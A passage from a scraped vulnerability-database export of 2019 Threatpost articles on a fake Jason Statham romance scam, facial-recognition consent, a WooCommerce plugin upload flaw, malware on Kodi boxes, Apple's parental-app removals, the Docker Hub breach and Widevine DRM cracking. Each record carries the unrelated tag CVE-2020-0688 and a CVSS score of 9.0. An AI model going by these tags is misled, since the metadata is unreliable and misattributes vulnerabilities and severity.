"https://threatpost.com/bec-hack-cons-catholic-church/144212/", "type": "threatpost", "title": "BEC Hack Cons Catholic Church Out of $1.75 Million", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:48", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "English actor Jason Statham \u2013 a.k.a. 
\u201cthe Transporter\u201d \u2013 is cozying up to people who like his Facebook page \u2013 or at least, someone purporting to be him is.\n\nA fraudster managed to bilk a vulnerable and unsuspecting Statham fan out of a \u201csignificant amount\u201d of money after approaching her while she was perusing a fan page for the actor on Facebook.\n\n\u201cShe thought it was nice that the actor had seemingly embraced \u2018talking to his fans,\u2019 and she admitted that she was also in a vulnerable place after recently losing her mother and fianc\u00e9,\u201d explained researchers at Tripwire, who flagged the incident in a [Monday post](<https://www.tripwire.com/state-of-security/latest-security-news/fraudster-posed-as-jason-statham-to-prey-upon-star-struck-users/>). \u201cShe therefore felt no unease when the fraudster asked her to talk with them over WhatsApp.\u201d\n\nA truly bad romance ensued, with hundreds of WhatsApp messages flying between the two over the course of months, during which Faux Statham professed his undying love: \u201cWill you love me and be the special woman beside me for the rest of your life honey\u201d reads one of the messages.\n\nAfter a pattern of trust was established, the supposed action-hero actor started to complain about financial difficulties due to a delayed film payment: \u201cI really need you to do this for me honey \u2019cause I can\u2019t trust anyone but you with my money honey.\u201d\n\nThe victim proceeded to send Western Union an undisclosed sum, after which the supposed Statham disappeared.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30163632/Statham-fraud.png>)\n\nSource: BBC\n\nAs detective constable Craig Moylon of the Greater Manchester Police in the UK [told the BBC](<https://www.bbc.com/news/uk-england-manchester-47969165>), \u201cThis lady has been subject to somebody who just tricked her at a very vulnerable time in her life. 
When you see the relentless messaging that this lady got from this person and you see the grooming and the exploitation\u2026 the impact is extraordinary.\u201d\n\nThe gullibility of the victim stood out to Tyler Reguly, manager of security R&D at Tripwire. He linked it to generational and cultural norms.\n\n\u201cThis is typically what I find most surprising about [successful scams](<https://threatpost.com/godaddy-shutters-subdomains-snake-oil/144147/>),\u201d he told Threatpost in an interview. \u201cThere\u2019s a desire to believe, no matter how unlikely the scenario. We\u2019re a society of dreamers \u2013 \u2018I can win the lottery,\u2019 \u2018I can marry Celebrity X,\u2019 \u2018I can perform on stage alongside Singer Y\u2019 \u2013 and unfortunately, modern generations are being brought up to put even more belief in their dreams. So, while we have more tech savvy individuals, we have more potential targets for these criminals.\u201d\n\nThis scam also highlights the ingenuity of bad actors who prey upon unsuspecting users on social media, according to Tripwire.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30164155/Jason-Statham-008.jpg>)\n\n\u201cI would suspect that they setup a fan page for a celebrity and then contacted people via that fan page, claiming to be the celebrity,\u201d Reguly said. \u201cAlternatively, they may have been looking for people who publicly \u2018liked\u2019 a real Jason Statham page and reached out to those users, which is why it is important to verify the identity of those sending messages before you respond. In the case of the former, Facebook has done a great job of providing verified pages (similar to Twitter\u2019s verified users) that make it easy to tell when you\u2019re looking at a page associated with a known entity. 
(Specifically: \u2018A blue verification badge confirms that this is an authentic Page for this public figure, media company or brand\u2019).\u201d\n\nThese types of scams are on the rise, precisely because they\u2019re successful.\n\n\u201cI\u2019d be willing to wager that it is starting to become relatively common,\u201d Reguly said. \u201cPeople tend to have a soft spot for celebrities, we see people stand in line for hours to catch a glimpse of their favorite star filming, or pay hundreds of dollars for a quick handshake and autograph at conventions. We have a desire to connect with people who have had a meaningful impact in our lives, and that is quite commonly celebrities, particularly those that filled a role near and dear to our hearts or that sung a song that has always stuck with us\u2026.These scams work because we want to believe.\u201d\n", "modified": "2019-04-30T21:24:20", "published": "2019-04-30T21:24:20", "id": "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "href": "https://threatpost.com/fake-jason-statham-fan-money/144247/", "type": "threatpost", "title": "Fake Jason Statham Bilks a Fan Out of Serious Money", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:16", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Half of respondents in a recent Threatpost poll said that they don\u2019t believe consent realistically exists when it comes to real-life facial recognition.\n\nThe [recent poll](<https://threatpost.com/poll-creeped-out-facial-recognition/144084/>) of 170 readers comes as facial recognition applications [continue to pop up](<https://threatpost.com/facial-recognition-are-we-ready/144066/>) in the real world \u2013 from airports to police forces. 
While biometrics certainly has advantages \u2013 such as making identification more efficient \u2013 gaining consent from people whose biometrics are being taken remains a mystery to some, with 53 percent of respondents saying they don\u2019t believe that consent exists or is possible in real-life facial recognition applications.\n\nIn the poll, 32 percent more respondents said that consent will be the act of giving people notification that an area is using facial recognition; and only 10 percent said consent is the ability to opt out of facial recognition applications.\n\nThe issue of biometrics consent came to the forefront again in December when the Department of Homeland Security unveiled a facial-recognition pilot program for monitoring public areas surrounding the [White House](<https://threatpost.com/white-house-facial-recognition-pilot-raises-privacy-alarms/139649/>). When asked about consent, the department said that the public cannot opt-out of the pilot, except by avoiding the areas that will be filmed as part of the program.\n\n\u201cA very weak form of protection is if the government or a business [that uses biometrics for] surveillance, they notify people,\u201d Adam Schwartz, senior staff attorney with the Electronic Frontier Foundation\u2019s civil liberties team, told Threatpost. 
\u201cWe think this is not consent \u2013 real consent is where they don\u2019t aim a camera at you.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/25163405/consent.png>)\n\nBeyond consent, more than half of poll respondents said that they have negative feelings toward facial recognition due to issues related to privacy and security \u2013 while 30 percent more said they have \u201cmixed\u201d feelings, understanding both the benefits and privacy concerns.\n\nWhen asked what concerns them the most about real-world facial applications, 55 percent of those surveyed pointed to privacy and surveillance issues, while 29 percent said the security of biometrics information and how the data is shared.\n\nDespite these concerns, biometrics continues to gain traction, with the EU last week [approving](<https://www.securityresearch-cou.eu/sites/default/files/02.Rinkens.Secure%20safe%20societies_EU%20interoperability_4-3_v1.0.pdf>) a massive biometrics database for both EU and non-EU citizens. The EU\u2019s approval of the database, called the \u201cCommon Identity Repository,\u201d will aim to connect the systems used by border control, migration and law-enforcement agencies.\n\nAs biometrics continue to increase, meanwhile, up to 85 percent of respondents said that they think that facial recognition should be regulated in the future.\n\nSuch laws exist or are being discussed as it relates to consent: An [Illinois law](<http://www.ilga.gov/legislation/ilcs/ilcs3.asp?ActID=3004&ChapterID=57>) for instance regulates collection of biometric information (including for facial recognition) without consent.\n\nHowever, that law only applies to businesses and not law enforcement. 
Meanwhile, a new bill introduced in the Senate in [March](<https://www.schatz.senate.gov/imo/media/doc/SIL19337.pdf>), the \u201cCommercial Facial Recognition Privacy Act,\u201d would bar businesses that are using facial recognition from harvesting and sharing user data without consent.\n\n\u201cThe time to regulate and restrict the use of facial recognition technology is now, before it becomes embedded in our everyday lives,\u201d said Jason Kelly, digital strategist with EFF, in a [recent post](<https://www.eff.org/deeplinks/2019/04/skip-surveillance-opting-out-face-recognition-airports>). \u201cGovernment agencies and airlines have ignored years of warnings from privacy groups and Senators that using face recognition technology on travelers would massively violate their privacy. Now, the passengers are in revolt as well, and they\u2019re demanding answers.\u201d\n", "modified": "2019-04-26T12:10:15", "published": "2019-04-26T12:10:15", "id": "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "href": "https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/", "type": "threatpost", "title": "Facial Recognition 'Consent\u2019 Doesn\u2019t Exist, Threatpost Poll Finds", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:08", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "UPDATE\n\nA vulnerability in a popular WordPress plugin called the WooCommerce Checkout Manager extension is potentially putting more than 60,000 websites at risk, researchers say.\n\nThe WooCommerce Checkout Manager plugin allows WooCommerce users to customize and manage the fields on their checkout pages. The plugin, owned by Visser Labs, is separate from the WooCommerce plugin, which is owned by Automattic.\n\nAs of Monday, an update for WooCommerce Checkout Manager is available (version 4.3) that patches the vulnerability. 
That can be downloaded [here](<https://wordpress.org/support/topic/upgrade-to-4-3/>).\n\n\u201cEarlier this week, an arbitrary file upload vulnerability has been found in popular WordPress plugin WooCommerce Checkout Manager which extends the functionality of well known WooCommerce plugin,\u201d said Luka Sikic, with WebArx Security in a [Thursday post](<https://www.webarxsecurity.com/woocommerce-checkout-manager/>).\n\nVisser Labs has not responded to a request for comment from Threatpost. On Friday, the plugin was removed from the WordPress plugin repository. \u201cThis plugin was closed on April 26, 2019 and is no longer available for download,\u201d according to a [notice](<https://wordpress.org/plugins/woocommerce-checkout-manager/>) on the site. However, that still leaves the 60,000 websites that have already downloaded and are utilizing the plugin open to attack, according to researchers.\n\nOn Tuesday, Plugin Vulnerabilities published a proof of concept outlining an attack on an arbitrary file upload vulnerability in WooCommerce Checkout Manager. The disclosed vulnerability exists because the plugin\u2019s \u201cCategorize Uploaded Files\u201d option does not check privileges or permissions before files are uploaded. 
As a result, bad actors could upload \u2013 and then execute \u2013 malicious files.\n\n\u201cSince there is no privilege or permission check before uploading a file, the exploitation of the vulnerability in WooCommerce Checkout Manager is simple and doesn\u2019t require an attacker to be registered on the site,\u201d Sikic said.\n\nThe number of vulnerable plugins being exploited in a massive campaign is racking up, with the WooCommerce Checkout Manager the latest plugin to be exploited.\n\nThe WooCommerce Checkout Manager is only the latest plugin to have a disclosed vulnerability, researchers say.\n\n\u201cWe continue to see an increase in the number of plugins attacked as part of a campaign that\u2019s been active for quite a long time,\u201d according to John Castro with Sucuri in a recent [post](<https://blog.sucuri.net/2019/04/plugins-added-to-malicious-campaign.html>). \u201cBad actors have added more vulnerable plugins to inject similar malicious scripts.\u201d\n\nOther plugins recently added to the attack include WP Inventory Manager and Woocommerce User Email Verification. That\u2019s on top of others, including Social Warfare, [Yellow Pencil Visual Theme Customizer](<https://threatpost.com/wordpress-yellow-pencil-plugin-exploited/143729/>), and [Yuzo Related Posts](<https://threatpost.com/wordpress-urges-users-to-uninstall-yuzo-plugin-after-flaw-exploited/143710/>).\n\nResearchers urged plugin users to disable the plugin completely or disable the \u201cCategorize Uploaded Files\u201d option on the plugin settings page.\n\n\u201cAttackers are trying to exploit vulnerable versions of these plugins,\u201d said Castro. \u201cPublic exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.\u201d\n\n_This article was updated on April 30 at 8 a.m. 
ET to reflect that the vulnerability has now been patched._\n", "modified": "2019-04-26T19:44:55", "published": "2019-04-26T19:44:55", "id": "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "href": "https://threatpost.com/users-urged-to-disable-wordpress-plugin-after-unpatched-flaw-disclosed/144159/", "type": "threatpost", "title": "Users Urged to Update WordPress Plugin After Flaw Disclosed", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:57", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "You get what you pay for when you pirate content. That\u2019s the takeaway from the latest report by Digital Citizens Alliance.\n\nIt found that pirating hardware, which enables free streaming of copyright-protected content, comes packed with malware. The devices give criminals easy access to router settings, can plant malware on shared network devices and are often leveraged to steal user credentials.\n\nAccording to the [Digital Citizens Alliance report](<https://www.digitalcitizensalliance.org/clientuploads/directory/Reports/DCA_Fishing_in_the_Piracy_Stream_v6.pdf>) (PDF), 13 percent of 2,073 Americans surveyed use a hardware device for pirating content. One such popular device is called a \u201cKodi box,\u201d which is sold for between $70 and $100 on grey markets. Kodi is an open-source media player designed for televisions and developed by the XBMC Foundation. The software is widely known for its support of a bevy of copyright-infringing apps that offer free access to premium content from Netflix, Amazon Prime, Hulu, sports networks and paid subscription music services.\n\n\u201cBy plugging the device into a home network, [users] are enabling hackers to bypass the security (such as a router\u2019s firewall) designed to protect their system. 
If apps on the box or that are later downloaded have malware, the user has helped the hacker past network security,\u201d wrote Digital Citizens Alliance (DCA) in a recently released report.\n\nIn a review of hardware and pirating apps, such as FreeNetflix, researchers said they found malware piggybacking on illegal apps and preloaded with content. For example, when researchers installed a live sports streaming app called Mobdro, the app forwarded the researcher\u2019s Wi-Fi network name and password to a server in Indonesia.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29154055/Jailbroken-Firestick-image.png>)\n\nExample of a jail broken Amazon Fire TV Stick for sale. Courtesy: Digital Citizens Alliance\n\nIn other instances, 1.5 terabytes of data was uploaded from a device that shared the same network of the Kodi box. And, in yet another instance, \u201cresearchers uncovered a clever scheme that enabled criminals to pose as well-known streaming sites, such as Netflix, to facilitate illegal access to a legitimate subscription of an actual Netflix subscriber,\u201d according to the report.\n\nFor its investigation DCA partnered with GroupSense, a security firm that specializes in chatrooms that facilitate black market sales. It claims hackers were discussing how to leverage networks compromised by illicit media streaming services in hopes of recruiting them into DDoS botnets or to mine cryptocurrency.\n\n\u201cGiven that users rarely install anti-virus tools on such devices, the opportunities for exploitation are numerous,\u201d wrote researchers.\n\nThe unsavory worlds of [pirated content and malware are no strangers](<https://threatpost.com/searches-for-pirated-content-lead-to-pain-and-little-gain/113515/>). Researchers have [long warned that patronizing such](<https://threatpost.com/passteal-malware-lurking-file-sharing-sites-112112/77239/>) services is a shortcut to infection. 
Earlier this month, [Kaspersky Lab released a report](<https://threatpost.com/game-of-thrones-malware-piracy/143318/>) that found that illegal downloads of HBO\u2019s Game of Thrones accounted for 17 percent of all infected pirated content in the last year.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29154327/Firestick-Apps.png>)\n\nExamples of apps running on the Kodi platform.\n\nIn [Aug. 2018 researchers at ESET](<https://www.welivesecurity.com/2018/09/13/kodi-add-ons-launch-cryptomining-campaign/>) said they found DDoS modules had been added to a Kodi third-party add-on. ESET said it also found copyright-infringing apps that came with multi-stage crypto-mining malware that targeted Windows and Linux systems.\n\nAs part of its report, DCA reached out to XBMC Foundation. XBMC quickly rebuffed any notion it tacitly supported or endorsed pirated content. \u201cIf you are selling a box on your website designed to trick users into thinking broken add-ons come from us and work perfectly, so you can make a buck, we\u2019re going to do everything we can to stop you,\u201d it told DCA.\n\nThe Kodi application typically runs on a wide range of hardware and is sold by independent resellers on eBay, Facebook Marketplace and Craigslist. DCA said it also found Kodi pre-installed on a number of devices including inexpensive China-made media streamers. The software can also be found on devices that were sold pre-sideloaded with Kodi software. Users can also choose to install the Kodi application on existing hardware.\n\nTo be clear, the Kodi software is not illicit. Rather, researchers are concerned the Kodi platform supports pirating apps that can harbor malware. Researchers are also concerned that some hardware devices that are sold as \u201cKodi boxes\u201d come pre-installed with malicious code and apps used to pirate streaming content.\n\nDCA did its own independent testing over the course of 500 hours of lab testing. 
It estimates there are 12 million active users of the illicit devices in North American homes. Those users \u201cpresent a tempting target because they offer hackers a new avenue to exploit consumers and a path to reach other devices on a home network. The findings should serve as a wake-up call for consumers, the technology community, and policymakers to take the threat seriously,\u201d it said.\n", "modified": "2019-04-29T20:31:30", "published": "2019-04-29T20:31:30", "id": "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "href": "https://threatpost.com/kodi_box_malware/144191/", "type": "threatpost", "title": "Malware Infests Popular Pirate Streaming Hardware", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T12:00:27", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Apple is defending its decision to take down several highly popular parental control apps amidst a firestorm of backlash, saying it did so for \u201cprivacy and security\u201d reasons.\n\nApple came under scrutiny this weekend after a New York Times article alleged that the phone giant had unfairly removed or restricted at least 11 top screen-time and parental-control apps from its marketplace \u2013 after creating its own screen-time app. Among those that have been removed are OurPact, which has 3 million downloads, and Mobicip, which has 2.5 million downloads.\n\nWhile it looks like a competitive move, Apple tells a different story: Its aim was to weed out apps that were using mobile device management (MDM) technology it said, which gives third-party control and access over other devices and sensitive information, including location, app use and more. 
Parental-control apps, which allow parents to keep tabs (and set limits) on their children\u2019s on-phone activities, locations and more, are thus effectively collecting way too much data, Apple said.\n\n\u201cWe recently removed several parental-control apps from the App Store, and we did it for a simple reason: They put users\u2019 privacy and security at risk. It\u2019s important to understand why and how this happened,\u201d the company said in a [Sunday statement](<https://www.apple.com/newsroom/2019/04/the-facts-about-parental-control-apps/>), entitled \u201cThe Facts About Parental Control Apps.\u201d\n\nRegardless of the reason, the incident has raised questions about how competition is handled between apps and the sometimes-competing platforms that they are sold on. Impacted app developers, for their part, continue to be up-in-arms regarding the incident \u2013 with two popular parental control apps, Kidslox and Qustodio, last week filing an anti-competition complaint with the European Commission\u2019s competition office.\n\n## Angry App Devs\n\nThe Saturday [report](<https://www.nytimes.com/2019/04/27/technology/apple-screen-time-trackers.html>) by the _New York Times_, working with app data firm Sensor Tower, shows that Apple has removed or restricted 11 of the 17 most downloaded parental-control apps, as well as restricting lesser-known apps. 
That includes forcing apps to remove features that enable parents to control children\u2019s devices, or restrict access to adult content.\n\nThe move comes after Apple launched its own screen control app, Screen Time, a feature built into iOS 12 that enables users to set screen time and limits on their own phones.\n\nThe complaint from Kidslox and Qustodio that was filed with the European Commission\u2019s competition office was filed in tandem with the report, saying that the removal and restriction of parental-control apps was an anti-competitive practice by nature.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29144205/screen-time-1-.png>)\n\nParental Control Apps\n\nKidslox alleges that Apple has required it to make changes to its app that ultimately harmed its competitive factor.\n\n\u201cTo create Screen Time, Apple took the best pieces and best practices from existing parental-control and well-being apps in the App Store, bringing no tangible innovations to market,\u201d Kidslox CEO Viktor Yevpak said in a statement provided to Threatpost. \u201cStanding up to Apple is about even more than fair competition.\u201d\n\nMeanwhile Qustodio, in a statement shown to Threatpost regarding the EU complaint, said that Apple has arbitrarily blocked several parental-control apps in the market from making app updates, while completely removing others.\n\n\u201cWith the introduction of Apple\u2019s Screen Time, developers in the parental control category experienced unprecedented anti-competitive behavior from Apple,\u201d Qustodio CEO Eduardo Cruz said in the statement. 
\u201cThe company acts as both a marketplace and a gatekeeper and uses its dominant position to create exclusive competitive advantage for its own service.\u201d\n\nOther screen-time apps began complaining about being removed from the Apple Store all the way back in the fall of 2018, including Mute, a screen-time tracking app.\n\nNick Kuh, creator of Mute, [complained](<https://medium.com/@nick.kuh/mute-app-startup-to-shutdown-a1db01440c56>) in October 2018 that Apple had removed his app from the App Store (Apple later returned his app after his post gained media attention).\n\n\u201cIt appears that Apple are now shutting down many (all?) screen-time tracking apps now that they\u2019ve added screen-time tracking into iOS 12,\u201d he said in his post. \u201cIt turns out that Apple have sent a similar email to many other app developers of screen-time tracking and parental-control apps. I believe that Mute is one of the first to go, but expect others to disappear from the App Store in the coming weeks as their notice period expires.\u201d\n\n## Apple Hits Back\n\nIn response to reports of developer outrage, Apple said in a statement: \u201cApple has always supported third-party apps on the App Store that help parents manage their kids\u2019 devices. Contrary to what the _New York Times_ reported over the weekend, this isn\u2019t a matter of competition. It\u2019s a matter of security.\u201d\n\nApple said several of the apps removed use the MDM format, which is typically used by enterprises to give companies control over their employees\u2019 devices. However, when non-enterprise developers use the feature on their apps, the technology can have dangerous privacy and security implications, Apple said.\n\nThese MDM functions give apps a \u201cconfiguration profile\u201d which is generally used for enterprises \u2013 and allow users to configure or track certain settings \u2013 including app settings, Wi-Fi and permissions. 
In other words, app developers behind the apps gain access to all data \u2013 such as location, activity and more \u2013 of the children whose phones are being controlled.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29144327/screen-time-2.png>)\n\nApple Screen Time\n\nApple did not respond to multiple requests for comment from Threatpost.\n\nThe company in its statement said that it began noticing that non-enterprise developers were using MDM back in early 2017, and updated their guidelines based on that work in mid-2017.\n\n\u201cWhen we found out about these guideline violations, we communicated these violations to the app developers, giving them 30 days to submit an updated app to avoid availability interruption in the App Store,\u201d Apple said. \u201cSeveral developers released updates to bring their apps in line with these policies. Those that didn\u2019t were removed from the App Store.\u201d\n\nHowever, app developers argue that MDM is not used maliciously and that parents setting up the apps are given fair notice about the MDM features when downloading the app.\n\nSuren Ramasubbu, CEO of one of the parental control apps impacted by Apple\u2019s crackdown, Mobicip, said that when parental control apps using MDM are installed, it is the parent that goes through the process of setting up \u2013 and they are explicitly asked to agree to the terms and conditions and privacy policy before installing the MDM profile and certificate.\n\n\u201cPlease note that the parent has explicitly agreed to enroll the device in a third-party MDM system,\u201d he said in a [post](<https://medium.com/@suren_60419/apples-case-for-removing-screentime-apps-seven-questions-for-phil-schiller-33cf78b01713>) over the weekend. \u201cDo these parents understand the risks? May be. May be not. But should it be the parent who decides the risk vs. reward? 
Given that Apple Screen Time requires both parents and children to be on Apple devices, and given that most families today have a blend of devices with the parents on Android, isn\u2019t it anti-competitive to not give parents this choice?\u201d\n\nApps like Kidslox and Qustodio continue to maintain that Apple\u2019s practices are unfair \u2013 and ultimately hurting both app developers and consumers.\n\n\u201cQustodio and Kidslox are asking Apple to stop this unprecedented hostile behavior, compete fairly, and open up exclusive API\u2019s and technologies introduced in their own Screen Time service,\u201d according to Qustodio.\n\nIt\u2019s not the first time Apple has come under fire for anti-competition app store practices \u2013 in March, [Spotify filed a complaint](<https://newsroom.spotify.com/2019-03-13/consumers-and-innovators-win-on-a-level-playing-field/>) against the iPhone maker saying that newly-introduced App Store rules \u2013 such as a 30 percent tax imposed on purchases made via Apple\u2019s payment system \u2013 stifle competing music services that are being sold on its platform.\n", "modified": "2019-04-29T19:26:31", "published": "2019-04-29T19:26:31", "id": "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "href": "https://threatpost.com/apple-parental-control-app-removal/144181/", "type": "threatpost", "title": "Apple Defends Parental Control App Removal Amid Backlash", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:03", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "UPDATE\n\nDocker Hub has confirmed that it was hacked last week; with sensitive data from approximately 190,000 accounts potentially exposed.\n\n\u201cOn Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data,\u201d Kent Lamb, director of Docker Support, said in an email over the weekend, which a Docker user [posted on 
online](<https://news.ycombinator.com/item?id=19763413>). \u201cUpon discovery, we acted quickly to intervene and secure the site.\u201d\n\nThe container specialist noted that it was a \u201cbrief period\u201d of unauthorized access that impacted less than 5 percent of Hub users; however, the data includes usernames and hashed passwords, as well as GitHub and Bitbucket tokens for Docker autobuilds.\n\nDocker has revoked GitHub tokens and access keys for affected accounts, and the company warned that this may affect ongoing builds from its automated build service; users \u201cmay need to [unlink and then relink](<https://docs.docker.com/docker-hub/builds/link-source/>) your GitHub and BitBucket source provider,\u201d Lamb warned.\n\nTorsten George, cybersecurity evangelist at Centrify, told Threatpost that \u201cWhen you dig deeper into the details of the breach, you\u2019ll see that it\u2019s not about the numbers, but the reach. The big issue about this breach is the fact that the database included tokens from other much-used developer resources, including GitHub and Bitbucket. This breach stresses the importance of application-to-application password management (AAPM) and temporary credentials rather than permanent ones.\u201d\n\n## Ramifications and What to Do\n\nCleanup from the incident could be a significant endeavor, according to researchers.\n\n\u201cAs a result of this breach, it\u2019s possible that images in your Docker Hub repository may have been tampered with or overwritten,\u201d Wei Lien Dang, vice president of product at StackRox, told Threatpost. \u201cAttacks on the build pipeline can have serious downstream effects on what is currently running inside your infrastructure. Tainted images can be difficult to detect, and the containers launched from them may even run as expected, except with a malicious process in the background. 
If you use Docker Hub with Kubernetes environments, you\u2019ll also need to roll your ImagePullSecrets.\u201d\n\nEven though the passwords were hashed, Docker Hub users should change their passwords on Docker Hub and any other accounts that share that password. Users can also [view security actions](<https://help.github.com/en/articles/reviewing-your-security-log%20and%20https:/bitbucket.org/blog/new-audit-logs-give-you-the-who-what-when-and-where>) on GitHub and BitBucket accounts to check for unauthorized access.\n\n\u201cUnexpected changes in images will have an effect on application behavior, making runtime detection and application baselining critical,\u201d Dang said. \u201cCharacterizing the behaviors of individual Kubernetes deployments will highlight deviations in network connectivity, file access and process executions. These deviations are all indicators that malicious activity is taking place within a container. You need the ability to quickly inspect runtime activity within your containers to verify they are running only expected processes.\u201d\n\nAlso, because Docker didn\u2019t provide a specific timeline for this breach, no one knows how long ago the unauthorized access occurred. \u201cAs with most breaches, the perpetrators may have had access to compromised resources significantly longer than just last week,\u201d Dang said. \u201cTo be safe, you should verify recently pushed images going back over the past several weeks. Doing this audit can be difficult, as not every registry will let you filter the data by image age.\u201d\n\n## Docker: An Escalating Target?\n\nDocker has been in the security headlines before in the recent past; for instance, in January, researchers [hacked the Docker test platform](<https://threatpost.com/hack-allows-escape-of-play-with-docker-containers/140831/>) called Play-with-Docker with a proof-of-concept hack, allowing them to access data and manipulate any test Docker containers running on the host system. 
The team was able to escape the container and run code remotely right on the host.\n\nAlso, last year 17 malicious docker images [were found available](<https://threatpost.com/malicious-docker-containers-earn-crypto-miners-90000/132816/>) on Docker Hub that allowed hackers to earn $90,000 in cryptojacking profits.\n\nAnd Docker [in 2017 patched](<https://threatpost.com/docker-patches-container-escape-vulnerability/123161/>) a privilege escalation vulnerability that could also have led to container escapes, allowing a hacker to affect operations of a host from inside a container.\n\nContainers are increasing in popularity among DevOps users in companies of all sizes because they facilitate collaboration, which optimizes their ability to deliver code fast to virtual environments. However, Lacework in [an analysis in 2018](<https://threatpost.com/22k-open-vulnerable-containers-found-exposed-on-the-net/132898/>) noted that securing workloads in public clouds requires a different approach than that used for traditional data centers, where APIs drive the infrastructure and create short-lived workloads. In turn, they\u2019re also becoming more interesting to cybercriminals, Dan Hubbard, chief security architect at Lacework, told Threatpost.\n\nEnterprises also report an accelerating number of container attacks. In fact, 60 percent of respondents in [a recent survey](<https://threatpost.com/threatlist-container-security/140614/>) acknowledged that their organizations had been hit with at least one container security incident within the past year. In companies with more than 100 containers in place, that percentage rises to 75 percent.\n\n_This story was updated on April 30 to add insight into potential repercussions of the incident. 
_\n", "modified": "2019-04-29T14:13:23", "published": "2019-04-29T14:13:23", "id": "THREATPOST:B047BB0FECBD43E30365375959B09B04", "href": "https://threatpost.com/docker-hub-hack/144176/", "type": "threatpost", "title": "Docker Hub Hack Affects 190K Accounts, with Concerning Consequences", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:54", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Researchers have used a proof-of-concept (PoC) side-channel attack to download an unencrypted raw file for Netflix\u2019 Stranger Things, in a format that\u2019s ready to distribute out to any buyer on the internet.\n\nThis pirate\u2019s booty is the result of breaking open the widely deployed digital rights management (DRM) framework known as Widevine, the DRM engine behind Netflix, Hulu and Amazon Prime, among others.\n\nBy way of background, Widevine is an encryption method developed by Google but offered royalty-free to content creators and streaming services. According to Google stats, about 5 billion devices out there support it, and 82 billion content licenses are issued quarterly. In other words, it\u2019s a Big Kahuna when it comes to anti-piracy approaches \u2013 rivaled only by Apple\u2019s FairPlay and Microsoft\u2019s PlayReady DRM schemes.\n\nWidevine\u2019s end-to-end approach to encrypting copyrighted content and [preventing piracy](<https://threatpost.com/kodi_box_malware/144191/>) is actually quite secure, according to researchers at Fidus Information Security, who developed the PoC. 
But a vulnerability exists in Level 3 of the framework that opens the door to side-channel attacks.\n\n## The Widevine Approach\n\nTo keep pirates from streaming or downloading content that they shouldn\u2019t (both for personal or resale purposes), Widevine uses a combination of hardware security and an isolated secure operating system (OS).\n\nAs it explains in its [documentation](<https://www.widevine.com/>), Widevine offers three levels of content protection: 1, 2 and 3. Level 1 is the most secure, where all content processing and cryptography operations are handled inside a Trusted Execution Environment (TEE); and, Widevine is incorporated into a display via a secured path like HDCP. This is the case with most modern Android devices.\n\nIn Level 2, Widevine is used within a TEE to decrypt a stream, which is then sent to the display in an unprotected format.\n\nAnd in Level 3, which Fidus researchers were able to crack, Widevine is used to decrypt streams using the device\u2019s CPU rather than inside the secure TEE, after which the decrypted stream is sent to the display unprotected. The Chrome and Firefox browsers use Level 3, for instance.\n\nThe capabilities of the user\u2019s playback device and the quality of the content determines which level of protection is applied. Level 3 is used mainly for non-HD streams, 720p and below, and low-resolution audio \u2013 content that would be delivered over spotty broadband to a desktop or laptop (which is why browsers support Level 3) or to less sophisticated, low-cost, non-HD devices that lack TEEs, which are [actually found in volume](<https://www.androidauthority.com/oneplus-5t-review-814075/>) in many areas of the world, like China. 
Some mobile devices also [block HD streams](<https://www.digit.in/features/mobile-phones/poco-f1-is-not-the-only-smartphone-to-block-hd-streaming-no-xiaomi-device-can-stream-netflix-in-hd-43339.html>) because of wireless carrier restrictions.\n\nIn all cases, \u201cthrough the design of the Widevine framework, the keys that have been used to encrypt the content are never actually exposed directly to the user,\u201d explained the firm, in a [Monday posting](<https://fidusinfosec.com/breaking-content-protection-on-streaming-websites/>) on the PoC. \u201cInstead, the header file that gets sent to the client when a stream is started contains the bare minimum information needed, containing just some metadata about the encryption scheme used.\u201d\n\nThat metadata then gets passed to the content decryption module (CDM), which is contained in the client or browser that the user has installed. The CDM handles getting the license keys from the Widevine license server, before the content is decrypted and displayed, using Arxan to obfuscate the communication with the server. The license server then sends back a license to the client, which contains the content keys. 
